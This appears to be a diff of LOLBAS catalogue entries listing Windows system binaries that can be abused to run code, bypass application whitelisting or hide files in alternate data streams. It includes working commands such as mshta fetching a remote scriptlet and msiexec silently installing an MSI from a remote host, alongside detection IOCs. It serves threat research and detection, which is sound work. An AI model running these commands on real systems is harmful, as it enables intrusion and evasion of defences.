| Categories: [] | ||||
| Commands: | ||||
|   - Command: Msconfig.exe -5 | ||||
|     Description: Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml. | ||||
|     Usecase: Code execution using Msconfig.exe | ||||
|     Category: Execute | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\msconfig.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\msconfig.exe | ||||
| Code Sample:  | ||||
| - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/mscfgtlc.xml | ||||
| Detection: | ||||
|  - IOC: mscfgtlc.xml changes in system32 folder | ||||
|  - IOC: msconfig.exe executing | ||||
| Resources: | ||||
|   - https://twitter.com/pabraeken/status/991314564896690177 | ||||
| Notes: | | ||||
|     Thanks to Pierre-Alexandre Braeken - @pabraeken | ||||
|     See the Payloads folder for an example mscfgtlc.xml file. | ||||
|  | ||||
|   - Link: https://twitter.com/pabraeken/status/991314564896690177 | ||||
| Acknowledgement: | ||||
|   - Person: Pierre-Alexandre Braeken | ||||
|     Handle: '@pabraeken' | ||||
| --- | ||||
| @@ -1,25 +1,37 @@ | ||||
| --- | ||||
| Name: Msdt.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Description: Microsoft diagnostics tool  | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Open .diagcab package | ||||
|     Description: '' | ||||
|   - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml | ||||
|       /skip TRUE | ||||
|   - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE | ||||
|     Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. | ||||
|     Usecase: Execute code | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE | ||||
|     Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. | ||||
|     Usecase: Execute code bypass Application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - 'C:\Windows\System32\Msdt.exe    ' | ||||
|   - 'C:\Windows\SysWOW64\Msdt.exe    ' | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\Msdt.exe | ||||
|   - Path: C:\Windows\SysWOW64\Msdt.exe | ||||
| Code Sample:  | ||||
| - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/PCW8E57.xml | ||||
| Detection: | ||||
|  - IOC:  | ||||
| Resources: | ||||
|   - https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/ | ||||
|   - https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ | ||||
|   - https://twitter.com/harr0ey/status/991338229952598016 | ||||
| Notes: | | ||||
|     Thanks to: | ||||
|     See the Payloads folder for an example PCW8E57.xml file. | ||||
|  | ||||
|   - Link: https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/ | ||||
|   - Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ | ||||
|   - Link: https://twitter.com/harr0ey/status/991338229952598016 | ||||
| Acknowledgement: | ||||
|   - Person:  | ||||
|     Handle: | ||||
| --- | ||||
| @@ -1,28 +1,57 @@ | ||||
| --- | ||||
| Name: mshta.exe | ||||
| Description: Execute, Read ADS | ||||
| Author: '' | ||||
| Name: Mshta.exe | ||||
| Description: Used by Windows to execute html applications. (.hta) | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: mshta.exe evilfile.hta | ||||
|     Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. | ||||
|     Usecase: Execute code | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1170 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1170 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")")) | ||||
|     Description: Executes VBScript supplied as a command line argument. | ||||
|   - Command: mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close(); | ||||
|     Usecase: Execute code | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1170 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1170 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close(); | ||||
|     Description: Executes JavaScript supplied as a command line argument. | ||||
|     Usecase: Execute code | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1170 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1170 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: mshta.exe "C:\ads\file.txt:file.hta" | ||||
|     Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. | ||||
|     Usecase: Execute code hidden in alternate data stream | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1170 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1170 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - C:\Windows\System32\mshta.exe | ||||
|   - C:\Windows\SysWOW64\mshta.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\mshta.exe | ||||
|   - Path: C:\Windows\SysWOW64\mshta.exe | ||||
| Code Sample:  | ||||
| - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct | ||||
| Detection: | ||||
|  - IOC: mshta.exe executing raw or obfuscated script within the command-line | ||||
|  - IOC: Usage of HTA file | ||||
| Resources: | ||||
|   - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Mshta.md | ||||
|   - https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4 | ||||
|   - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct | ||||
|   - https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ | ||||
|   - https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ | ||||
| Notes: Thanks to Casey Smith - @subtee, Oddvar Moe - @oddvarmoe | ||||
|  | ||||
|   - Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4 | ||||
|   - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct | ||||
|   - Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ | ||||
|   - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/   | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
| @@ -1,25 +1,54 @@ | ||||
| --- | ||||
| Name: Msiexec.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Description: Used by Windows to execute msi files | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: msiexec /quiet /i cmd.msi | ||||
|     Description: Installs the target .MSI file silently. | ||||
|     Usecase: Execute custom made msi file with attack code | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png | ||||
|     Description: Installs the target remote & renamed .MSI file silently. | ||||
|     Usecase: Execute custom made msi file with attack code from remote server | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: msiexec /y "C:\folder\evil.dll" | ||||
|     Description: Calls DLLRegisterServer to register the target DLL. | ||||
|     Usecase: Execute dll files | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: msiexec /z "C:\folder\evil.dll" | ||||
|     Description: Calls DLLRegisterServer to un-register the target DLL. | ||||
|     Usecase: Execute dll files | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10     | ||||
| Full Path: | ||||
|   - c:\windows\system32\msiexec.exe | ||||
|   - c:\windows\sysWOW64\msiexec.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\msiexec.exe | ||||
|   - Path: C:\Windows\SysWOW64\msiexec.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: msiexec.exe getting files from Internet | ||||
| Resources: | ||||
|   - https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/ | ||||
|   - https://twitter.com/PhilipTsukerman/status/992021361106268161 | ||||
| Notes: Thanks to ? - @netbiosX, PhilipTsukerman - @PhilipTsukerman | ||||
|  | ||||
|   - Link: https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/ | ||||
|   - Link: https://twitter.com/PhilipTsukerman/status/992021361106268161 | ||||
| Acknowledgement: | ||||
|   - Person: netbiosX | ||||
|     Handle: '@netbiosX' | ||||
|   - Person: Philip Tsukerman | ||||
|     Handle: @PhilipTsukerman | ||||
| --- | ||||
| @@ -1,22 +1,28 @@ | ||||
| --- | ||||
| Name: odbcconf.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Name: Odbcconf.exe | ||||
| Description: Used in Windows for managing ODBC connections | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: odbcconf -f file.rsp | ||||
|     Description: Load DLL specified in target .RSP file. | ||||
|     Description: Load DLL specified in target .RSP file. See the Playloads folder for an example .RSP file. | ||||
|     Usecase: Execute dll file using technique that can evade defensive counter measures | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - 'c:\windows\system32\odbcconf.exe    ' | ||||
|   - c:\windows\sysWOW64\odbcconf.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\odbcconf.exe | ||||
|   - Path: C:\Windows\SysWOW64\odbcconf.exe | ||||
| Code Sample:  | ||||
| - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/file.rsp | ||||
| Detection: | ||||
|  - IOC: | ||||
| Resources: | ||||
|   - https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b | ||||
|   - https://github.com/woanware/application-restriction-bypasses | ||||
|   - https://twitter.com/subTee/status/789459826367606784 | ||||
| Notes: | | ||||
|     Thanks to Casey Smith - @subtee, Nick Tyrer - @NickTyrer | ||||
|     See the Playloads folder for an example .RSP file. | ||||
|  | ||||
|   - Link: https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b | ||||
|   - Link: https://github.com/woanware/application-restriction-bypasses | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
| --- | ||||
| @@ -1,24 +1,44 @@ | ||||
| --- | ||||
| Name: Pcalua.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Description: Program Compatibility Assistant | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: pcalua.exe -a calc.exe | ||||
|     Description: Open the target .EXE using the Program Compatibility Assistant. | ||||
|     Usecase: Proxy execution of binary | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: pcalua.exe -a \\server\payload.dll | ||||
|     Description: Open the target .DLL file with the Program Compatibilty Assistant. | ||||
|     Usecase: Proxy execution of remote dll file | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java | ||||
|     Description: Open the target .CPL file with the Program Compatibility Assistant. | ||||
|     Usecase: Execution of CPL files | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\pcalua.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\pcalua.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: | ||||
| Resources: | ||||
|   - https://twitter.com/KyleHanslovan/status/912659279806640128 | ||||
| Notes: | | ||||
|     Thanks to: | ||||
|     fab - @0rbz_ | ||||
|     Kyle Hanslovan - @KyleHanslovan | ||||
|  | ||||
|   - Link: https://twitter.com/KyleHanslovan/status/912659279806640128 | ||||
| Acknowledgement: | ||||
|   - Person: Kyle Hanslovan | ||||
|     Handle: '@kylehanslovan' | ||||
|   - Person: Fab | ||||
|     Handle: @0rbz_ | ||||
| --- | ||||
| @@ -1,17 +1,26 @@ | ||||
| --- | ||||
| Name: Pcwrun.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Description: Program Compatibility Wizard | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Pcwrun.exe c:\temp\beacon.exe | ||||
|     Description: Open the target .EXE file with the Program Compatibility Wizard. | ||||
|     Usecase: Proxy execution of binary | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\pcwrun.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\pcwrun.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: | ||||
| Resources: | ||||
|   - https://twitter.com/pabraeken/status/991335019833708544 | ||||
| Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken | ||||
|  | ||||
|   - Link: https://twitter.com/pabraeken/status/991335019833708544 | ||||
| Acknowledgement: | ||||
|   - Person: Pierre-Alexandre Braeken | ||||
|     Handle: '@pabraeken' | ||||
| --- | ||||
| @@ -1,19 +1,28 @@ | ||||
| --- | ||||
| Name: PresentationHost.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Name: Presentationhost.exe | ||||
| Description: File is used for executing Browser applications | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Presentationhost.exe C:\temp\Evil.xbap | ||||
|     Description: Executes the target XAML Browser Application (XBAP) file. | ||||
|     Description: Executes the target XAML Browser Application (XBAP) file | ||||
|     Usecase: Execute code within xbap files | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - 'c:\windows\system32\PresentationHost.exe     ' | ||||
|   - 'c:\windows\sysWOW64\PresentationHost.exe    ' | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\Presentationhost.exe | ||||
|   - Path: C:\Windows\SysWOW64\Presentationhost.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: | ||||
| Resources: | ||||
|   - https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf | ||||
|   - https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ | ||||
| Notes: Thanks to Casey Smith - @subtee | ||||
|  | ||||
|   - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf | ||||
|   - Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
| --- | ||||
| @@ -1,23 +1,45 @@ | ||||
| --- | ||||
| Name: Print.exe | ||||
| Description: Download, Copy, Add ADS | ||||
| Author: '' | ||||
| Description: Used by Windows to send files to the printer | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe | ||||
|     Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt. | ||||
|     Usecase: Hide binary file in alternate data stream to potentially bypass defensive counter measures | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe | ||||
|     Description: Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe | ||||
|     Usecase: Copy files | ||||
|     Category: Copy | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe | ||||
|     Description: Copy File.exe from a network share to the target c:\OutFolder\outfile.exe. | ||||
|     Usecase: Copy/Download file from remote server | ||||
|     Category: Copy | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - C:\Windows\System32\print.exe | ||||
|   - C:\Windows\SysWOW64\print.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\print.exe | ||||
|   - Path: C:\Windows\SysWOW64\print.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: Print.exe getting files from internet | ||||
|  - IOC: Print.exe creating executable files on disk | ||||
| Resources: | ||||
|   - https://twitter.com/Oddvarmoe/status/985518877076541440 | ||||
|   - https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410 | ||||
| Notes: Thanks to Oddvar Moe - @oddvarmoe | ||||
|  | ||||
|   - Link: https://twitter.com/Oddvarmoe/status/985518877076541440 | ||||
|   - Link: https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410 | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
| @@ -1,18 +1,27 @@ | ||||
| --- | ||||
| Name: reg.exe | ||||
| Description: Export Reg, Add ADS, Import Reg | ||||
| Author: '' | ||||
| Name: Reg.exe | ||||
| Description: Used to manipulate the registry | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg | ||||
|     Description: Export the target Registry key and save it to the specified .REG file. | ||||
|     Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream. | ||||
|     Usecase: Hide/plant registry information in Alternate data stream for later use | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\reg.exe | ||||
|   - c:\windows\sysWOW64\reg.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\reg.exe | ||||
|   - Path: C:\Windows\SysWOW64\reg.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: reg.exe writing to an ADS | ||||
| Resources: | ||||
|   - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
| Notes: Thanks to Oddvar Moe - @oddvarmoe | ||||
|  | ||||
|   - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
| @@ -1,25 +1,39 @@ | ||||
| --- | ||||
| Name: Regasm.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Description: Part of .NET | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: regasm.exe /U AllTheThingsx64.dll | ||||
|     Description: Loads the target .DLL file and executes the UnRegisterClass function. | ||||
|   - Command: regasm.exe AllTheThingsx64.dll | ||||
|   - Command: regasm.exe AllTheThingsx64.dll  | ||||
|     Description: Loads the target .DLL file and executes the RegisterClass function. | ||||
|     Usecase: Execute code and bypass Application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1121 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1121 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: regasm.exe AllTheThingsx64.dll  | ||||
|     Description: Loads the target .DLL file and executes the RegisterClass function. | ||||
|     Usecase: Execute code and bypass Application whitelisting | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1121 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1121 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe | ||||
|   - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe | ||||
|   - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | ||||
|   - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: regasm.exe executing dll file | ||||
| Resources: | ||||
|   - https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ | ||||
|   - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs | ||||
|   - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md | ||||
|   - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
| Notes: Thanks to Casey Smith - @subtee | ||||
|  | ||||
|   - Link: https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ | ||||
|   - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
|   - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1121/T1121.md | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
| --- | ||||
| @@ -1,20 +1,36 @@ | ||||
| --- | ||||
| Name: regedit.exe | ||||
| Description: Write ADS, Read ADS, Import registry | ||||
| Author: '' | ||||
| Name: Regedit.exe | ||||
| Description: Used by Windows to manipulate registry | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey | ||||
|     Description: Export the target Registry key to the specified .REG file. | ||||
|     Usecase: Hide registry data in alternate data stream | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: regedit C:\ads\file.txt:regfile.reg" | ||||
|     Description: Import the target .REG file into the Registry. | ||||
|     Usecase: Import hidden registry data from alternate data stream | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - C:\Windows\System32\regedit.exe | ||||
|   - C:\Windows\SysWOW64\regedit.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\regedit.exe | ||||
|   - Path: C:\Windows\SysWOW64\regedit.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: regedit.exe reading and writing to alternate data stream | ||||
|  - IOC: regedit.exe should normally not be executed by end-users | ||||
| Resources: | ||||
|   - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
| Notes: Thanks to Oddvar Moe - @oddvarmoe | ||||
|  | ||||
|   - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
| @@ -1,18 +1,27 @@ | ||||
| --- | ||||
| Name: Register-cimprovider.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Description: Used to register new wmi providers | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Register-cimprovider -path "C:\folder\evil.dll" | ||||
|     Description: Load the target .DLL. | ||||
|     Usecase: Execute code within dll file | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\Register-cimprovider.exe | ||||
|   - c:\windows\sysWOW64\Register-cimprovider.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
